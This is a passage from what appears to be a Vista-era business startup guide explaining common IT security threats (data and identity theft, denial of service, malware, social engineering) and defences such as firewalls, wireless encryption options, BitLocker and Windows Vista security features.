Too many businesses take a “fire-fighting” approach to IT security. They’ll spend a minimum on securing their systems, then react after an incident has taken place.
With a long-term investment you must cover all existing threats and also anticipate some potential risks that may arise in the future. Is your business changing? Are you reaching new customers? Deploying new services? Adding more IT infrastructure? All of these elements may introduce new threats or make your business the target of an attack.
Data theft
The most obvious e-security threat to business is theft of sensitive data. Customer contact databases, confidential email, internal financial figures and unique plans or intellectual property could be very attractive to unscrupulous competitors or perpetrators of fraud. Hence, data thieves will pursue nefarious tasks such as dumpster diving (searching through rubbish for printouts and paper-based information), accessing deleted data from decommissioned computers (which is difficult to permanently erase), hacking into secure systems and courting disgruntled employees with bribes or coercion. Data theft is a wide-ranging problem affecting many aspects of IT security. Of particular concern in this area are unsecured or poorly secured wireless networks.
Identity theft
With today’s online banking, information services and product sales occurring so frequently via the Internet, there are of course numerous places where criminals can capture portions of your personal information. Your date of birth, middle name, income, home address, phone numbers and financial account numbers can all be captured by a determined thief. With that information aggregated, the criminal can attempt to access your accounts or take action on behalf of you personally, using your personal data to support their activity. For example, when you phone a call centre to perform changes on your personal accounts, you may be asked to verify a piece of personal information to verify your identity. The expert identity thieves will have this information. 
Denial of service and nuisance attacks
Denial of service attacks are typically an attempt to interrupt a business system such as a corporate website or e-commerce server. The attacker takes advantage of the way IP communications work, where each connection request for information from a website or system uses up a small amount of that system’s resources. To perform the attack, a number of computers are coordinated to send the target computer a massive stream of spurious requests which fill the system’s resources trying to answer them all. The result is that the genuine users or customers of the system are denied access due to the flood of traffic that is tying it up. Service downtime from denial of service attacks can be financially expensive and damaging to your businesses’ reputation. A router or firewall feature called Stateful Packet Inspection (SPI) can be helpful in combating denial of service attacks.
Malware
Malware is a blanket term referring to all forms of malicious software that can compromise a computer. Comprising viruses, trojans, spyware, worms and rootkits under the blanket term crimeware, it’s anything designed to fool the user, take control of their computer, steal information or (less commonly) destroy data. Malware is the primary reason that virus-scanning, spyware-scanning and firewall software packages are a cornerstone of the software business today.
A good package will scan incoming email and its attachments, monitor your network ports for unusual activity, catch applications stealthily installing themselves in the background of your user session, and code attempting to hijack your computer through a website. Increasingly, security software also provides protection and detection of phishing sites, which pose as authentic versions of financially-related websites in a bid to capture information like login names and passwords.
Data theft
When entire computers such as mobile worker’s laptops can so easily be stolen, the issue of protecting portable devices that contain personal and business information is critical. Once stolen, most entry-level password protection can be easily bypassed by a determined digital thief. Thus, for a business with a significant mobile workforce, hard drive encryption solutions are an excellent idea. Products such as Bitlocker Drive Encryption can lock down a hard drive’s contents, encrypting all the files and preventing unauthorised access. After a computer and its hard drive are decommissioned, it’s important to wipe the contents entirely clean – there’s no telling whose hands they may end up in. Triple-overwrite methods and other consumer-level tools may not entirely destroy a drive’s contents, which can be recovered in a lab environment. Procedures such as this are described as forensic recovery.
Social engineering
Mastered by the infamous hacker Kevin Mitnick, social engineering refers to methods used by hackers and criminals to gain information that they need. Initiating a phone call or email to an employee at the organisation they are trying to hack, the successful social engineer poses as a bona fide correspondent whom employees are likely to trust, showing their clear subject matter knowledge and references to other known employees to lend weight to their story. With a persuasive pitch, the miscreant can gain passwords, details of internal systems, names of key people and sensitive inside information. A successful application of this approach can gain the hacker far more valuable information than a random dumpster dive or port scan ever will. Unfortunately the only effective tool against social engineering is to educate your staff about its existence and implications – people naturally want to help other people, and the social engineers take advantage of this tendency.
TOP 5
Security myths
1. “You can’t receive an infection just by visiting a web site.”
UNTRUE Web sites today are a minefield of malicious code, in the form of Javascript, Java, ActiveX and Macromedia Flash exploits. When you see the note in a piece of interactive content “click here to activate this control”, be wary.
2. “Powerpoint files are safe.”
UNTRUE Powerpoint files are just as able as any other Office file to contain malicious macro code or trojans that will launch malicious elements.
3. “Unplugging my computer from the wall protects me.”
UNTRUE If your computer has already been compromised, it could become as vulnerable as a four-lane highway to the raw Internet. Unplugging it temporarily prevents active traffic from occurring, but it will resume the moment you plug it in again, unless the computer is properly disinfected. Unplugging is no substitute for up-to-date security software, updates and knowledge of threats.
4. “Funny ‘joke’ files from my friends won’t be infected.”
UNTRUE People may not scan files that come from a trusted source, but this kind of thinking could be the reason that none of your contacts previously scanned that file, either. Be especially wary of programs with the extensions .VBS, .COM., .BAT and .EXE.
5. “My network is so small, no one would bother hacking it.”
UNTRUE “Security by obscurity” is a problematic attitude that can lead to poorly secured systems becoming host “zombie” computers for massive spam mailouts or generators of denial-of-service attacks. No matter how small, any computer system can be attractive for hackers as a system for sending traffic or storing contraband data.
Firewalls
Firewalls are generally a piece of hardware that control traffic in and out of your network. They can block ports which aren’t used for your specific business applications, limiting an intruder’s ability to penetrate the network and cause havoc. Firewalls can also prevent unauthorised outbound traffic, preventing an infected computer from sending a barrage of signals throughout the network or into the Internet. There are also various forms of software firewall which run
on a user’s desktop computer.
Biometric scanners
Usernames and passwords are a common tool to secure access to resources. However, this kind of information is faceless, hence it can be compromised and then used by any individual to gain access. Biometrics is a way of more closely tying the individual user’s identity to the account and connected privileges that it has. The most common implementation of biometric access control is the fingerprint scanner, while more sophisticated systems involve full palm of the hand, iris or retinal scans.
Internet security suites
With the wide range of “point solutions” available today (individual software tools to secure one part of your system’s puzzle such as firewall or anti-virus scanner), it makes sense to buy a complete package of all the required components from a single vendor. This way you know that they are interoperable, you can easily track your expenditure on them and will usually update themselves via a common application, simplifying administration.
Q&A Which wireless security is best?
When using Wi-Fi wireless networking, security can be a problem. By default, these systems will often have no security applied, allowing any station to log on and access the network resources. Obviously this is less than ideal! We explore some of the wireless security mechanisms below and explain their protection value.
Changing the SSID
The Service Set Identifier is a name used to identify each wireless network. While changing this from the default is absolutely essential, this act doesn’t improve the security of the wireless network. Any wireless adapter nearby will be contacted by an unsecured base station and transmitted the SSID automatically, allowing them to connect.
MAC address filtering
MAC stands for Media Access Control. Limiting access to your wireless network via MAC address control is a reasonably good method for very small networks. You can find the MAC address in your networking adapter’s configuration settings. However, this isn’t the strongest method as the MAC address of wireless network adapters can be changed in software, and the MAC address itself is transmitted in the clear.
WEP
Wired Equivalent Privacy was one of the first encryption methods to be used with wireless networking, but it was shown to have fundamental flaws (PC Authority January 2007, page 48). If you’re serious about wireless networking security, do not use this standard.
WPA2-PSK
Wi-Fi Protected Access, Pre-Shared Key is a reliable system for securing a small wireless network of less than ten users. Each user is supplied the same SSID and passphrase to utilise the strong traffic encryption of this system. The drawback of this approach is that every user of the network must use a new password every time a user is removed from the network. WPA2 is also known as the 802.11i standard, created by the IEEE (American Institute of Electrical and Electronics Engineers).
802.1X and RADIUS authentication
While small Wi-Fi networks are manageable with a single access password for all users, for larger sites it’s essential to roll out a server that will authenticate multiple users and allow you to add and remove users as needed. This requires use of the 802.1X standard for Network Access Control and establishment of a RADIUS server (Remote Authentication Dial-In User Service), which allows maintenance of a list of users and individual passwords.
Windows Vista Security features
Security is one of the top selling points of Microsoft’s latest operating system. With 95 percent of the world’s business community using Windows, this system is hit by a daily barrage of hacker and vulnerability exploiters’ activity. Controlling rogue code, protecting the hard drive contents of a lost or stolen machine and managing Windows’ included security measures can ensure your businesses’ computing experience is as secure as possible.
Vista’s User Account Control (UAC)
The UAC is a new Vista feature that combats the problem of unauthorised code being executed on Windows computers. If a malicious program attempts to launch itself, the UAC will inform you that this is happening and give you the option to prevent it from running. This is an excellent control measure for spyware and malware, however it is fairly heavy-handed. It halts for all kinds of actions including legitimate Windows Vista programs and can rapidly become laborious if you are often adding new programs to your system. Still, for users who rarely change their system configuration, the UAC does add an all-new level of security.
Vista’s Windows Firewall
While the Windows XP firewall was widely derided as being about effective as a brick wall which is only one brick high, the Windows Vista version of the Windows Firewall has evolved in sophistication. Windows Firewall now includes application-specific blocking and can even detect port switching of messages leaving the computer, which can be a sign of malicious activity. Blocking such an attempt can prevent malware from spreading to other computers and escalating the problem.
Vista’s Windows Update
Windows Update was one of the poster-children features of Windows XP, rolling all of the labour-intensive application patches into a slick web interface and ActiveX control which downloads and installs updates fairly seamlessly. New features of Windows Update in Vista include configurable scheduling for update times. Updating your system software regularly during office down-time makes the process less intrusive and minimises any impact it has on your computer performance. You can also set updates to happen on demand automatically, with the option to review or approve them before they are downloaded.
Windows Defender
Spyware is a nefarious form of malware which has risen to prominence in the era following Windows 95. Typically arriving onto a host computer via malicious code on a website, spyware can mine personal information on your computer, tracks the Internet sites you have visited and could transmit this information out to a centralised collection point. Windows Defender is a Microsoft product that offers on-access spyware scanning, as well as the facility to remove detected malicious files. Windows Defender also has an interesting feedback mechanism whereby its users can submit reports of potential spyware activity by certain programs.
Microsoft Internet Explorer 7
Internet Explorer 7, as a benchmark application for website compatibility has a number of new security features. Protection against phishing sites is the most notable new addition, which compares the URL of sites the user is visiting against a database of known spoof sites, that mimic sites from real financial institutions. When this happens, the phishing filter will display a warning about the site that is loaded, allowing the user to make a decision about its veracity. Internet Explorer 7 also supports new Extended Validation (EV) certificates that provider stronger authentication of legitimate web sites. Internet Explorer 7 also limits the capabilities of the often-hijacked ActiveX control set, notifying you when a new or unusual control is being activated.
Bitlocker drive encryption
Bitlocker is a new feature that can encrypt the contents of a hard drive and password protect it, preventing unauthorised people from accessing any information on the drive.
Bitlocker has features for tamper-resistance, supporting Trusted Platform Module hardware and running integrity checks on early boot components, to avoid circumvention from a variety of methods. It encrypts not only the operating system files but also the swap files and hibernation files, which can contain vital and sensitive information.
Bitlocker is only available in Windows Vista Ultimate and Enterprise editions.
Business Startup Guide continues: Imaging & Printing